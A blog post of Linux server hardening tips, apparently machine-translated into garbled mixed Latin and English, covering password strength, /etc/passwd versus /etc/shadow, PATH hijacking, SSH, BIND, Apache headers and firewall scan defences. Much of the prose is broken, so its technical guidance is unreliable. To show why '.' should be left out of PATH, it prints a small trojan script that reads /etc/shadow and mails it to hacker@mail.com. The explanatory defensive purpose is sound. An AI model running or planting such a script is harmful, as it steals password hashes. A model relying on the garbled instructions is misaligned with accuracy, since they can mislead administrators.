Security Tips pro Vestri Linux (Servo) (Pars I)

Non editis de blog nihil diu placet, et hoc consilium ad participes cum te aliquid ex libro illius sumpta, (inter alios). Et non inveni in Universitate solum legere et tamen vere est aliquantulus outdated, et technicae artes sunt abhorret quod ostensum est in opere dedit ad unitatem essentiae pertinet ratio, quod quoque ostensum est interesting facies potest. 9788448140502

Manifestum est quod volo accumsan sapien cultor Linux ratio ponitur in medio vel in magnis data gradu user escritorio tametsi possunt, nihil esse utile.

Moneo ego quoque velox quod simplex tips sunt et non in multo detail, ego tamen multo magis specifica, et a cogitationibus suis donec extensive post alia maxime in topic. Sed quod youll 'animadverto post. Lets 'adepto coepi.

Password rationesque tueantur. 

Etsi ea sonat a catchphrase, consilium habent a bonus password facit ratio intercedat inter vulnerable aut non. Sicut impetus "violente" adfligere contribules habens malum a password ut obvius ratio. Summis plerumque sunt

  • Miscere uppercase et lowercase.
  • Uti specialem ingenia.
  • Numbers.
  • Magis quam VI numeri (hopefully magis quam VIII).

Praeter haec, considerans de duobus dimittam essential files.  / Etc / passwd et / etc / umbra.

Very important lima quod sit aliquid / Etc / passwd. In addition ut det nobis user nomen eius uid, folder semita, bash et cetera .. in quibusdam casibus etiam ostendit quod user scriptor clavis encrypted.

 Intueamur compositionem consequuntur propria.

desdelinux:FXWUuZ.vwXttg:500:501::/home/usuario1:/bin/bash

user: cryptkey: uid: gid: iter :: semita: vercundus

Et ipsa quaestio hie est, quod maxime habet lima permissions r-rw - r- si quo modo eam legere ad licentias super user ratio. habentem clavem est quod est encrypted ne nimis facile perspici possint vera in unum.

Cur existit lima quod suus ' / Etc / umbra. Haec est tabella claves user, ubi omnes thesauri, inter alia. Hic usor potest legi ne quis lima permissions habet necesse est.

Ad hoc fix erit: ad lima ut must / Etc / passwd mutata in encrypted et clavem ad "x", hoc non erit nisi is key lima in nostrum / Etc / umbra.

desdelinux:x:500:501::/home/usuario1:/bin/bash

Problems per viam .bashrc et aliis.

Quando a user imperium ducit in console, quo imperium ad formam conchae per Directory continebat in album elit ITER variabilis.

Si typus "vocis $ semitam immortalitatis" in console quod aliquid simile hoc erit output.

.:/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games:/home/carlos/bin

Quilibet enim illorum folders testa in qua non expecto enim mandatum est mihi facturos confirmaverunt. Qui "". Primum quaero folder quin idem folder unde mandatum executus.

Putant enim a user "Carolus" et haec usor vult 'malum facere. " Hic fasciculus dicitur exire "u" folder in pelagus et exequi mandatum file similia

#!/bin/bash
cat /etc/shadow | mail hacker@mail.com
/bin/ls

Si radix User rerum destinatum nititur enumerare folder intra Vivamus folder (ut prius respicit praeceptum eadem folder, imprudenter eum missuri lima per Tesserae email deinde folder esse voluerunt et non invenietis et usque ad ipsum nuper.

Ad hoc nos eliminate vitare in "". in LIMES variabilis.

Eodem modo /.bashrc ut lima, /.bashrc_profile, nihil reprehendo audiuerit ./.login debet "." in LIMES variabilis est, et quidem ex files like this, vos potest mutare locum desideratum certis de imperio.

Cum tips confinia:

SHH

  • I inactivare version de ssh protocol in sshd_config lima.
  • Noli vinci a radice aperi ssh user.
  • Et ssh_host_key lima quod folders, et ssh_host_dsa_key ssh_host_rsa_key si modo legitur radix, a user.

AUCTORO

  • Grata nuntius ad mutare in named.conf lima ut ostenderet non in numero versionem
  • Transfert zona terminus, et eo modo ad enable teams qui non indigent.

Apache

  • Ne religio a version in materiam exercendae grata nuntius. Recensere httpd.conf cum lima et addendi sunt lineae, vel mutari,  

ServerSignature Off
ServerTokens Prod

  • Disable automatic Indexing
  • Configure apache non erat qui operaretur sicut sensitivo files .htacces: * .inc, * etc .. .jsp
  • Remove aut paginae homini religio ex sample
  • Apache in current environment chrooted

Network Security.

Omnia fieri ratione necesse est viscus externis ad ipsum hic prohibet aliquam sapien interpellatores a network notitia obtinens lustro.

ICMP negotiationis obstructionum

Firewall quod esse potest angustos omnes figuram tenentibus et advenientis et exitu ICMP negotiationis resonare respondeo. In hoc autem quod vitare, exempli gratia, a scanner apparatu that is vultus ad vivere in a range of IP te locat. 

TCP ne ping scan.

Unum iter scan vestri ratio est TCP ping scan. Item esto, quod servo tuo a servo Apache est ad portum 80. Haud intrusorem potest mittere ad portum, qui est ACK petitionem. Cum haec, si ratio respondit: computer mos scan Reliqua viveret et in portubus morabatur.

Nam hoc ut vestri firewall semper optionem habes "status conscientia" et ne abiicias universa quæ facis AKC TCP iunctio aut sessionem non correspondent radici iam positae ostendat.

Quidam tips additional:

  • IDS systems usus est deprehendere portum scans vestri network.
  • Configure firewall occasus, ut non habeat fiduciam nexum fons portum.

Hoc autem quod de usu lustrat "fake" sicut fons portum LIII aut XX, quia multi portus systems habeat fiduciam quia haec est typical of an FTP intrumento uel aliis in DNS.

Nota: Memento quod pleraque ex his difficultates post iam soluta est supra, omnes fere current diuisit. His incommodis doleat notitia ut nunquam clavis ut non contingat.

Nota: Et postea videbo topic in propria, et me in tanto magis faciet post quod magis detailed current notitia.

Ut quisque Lectio Thaks.

Salvete.


Contentum enim sua adhaeret unicuique nostrum principiis articulum editorial ethicam. Errorem referunt ad click hic.

A comment, valedixit tua

Relinquite infantiam comment

Tua inscriptio electronica Quisque sit amet nisl. Velit sunt insignis Nomen est *

*

*

  1. Responsible pro notitia: Miguel Angelus Gatón
  2. Ad in notitia: Imperium SPAM, administratione comment.
  3. Legitimation vestri consensu,
  4. Lorem notitia, notitia non communicatur nisi per alios obligationem.
  5. Notitia repono: Database hosted per Occentus Networks (EU)
  6. Iura Et quando potes limit, et delere recuperet vestri notitia.

  1.   informatic dixit:

    Ego vere probaverunt articulum de Ego sum interested in subiecto, et ego ad te dare continue uploading contentus.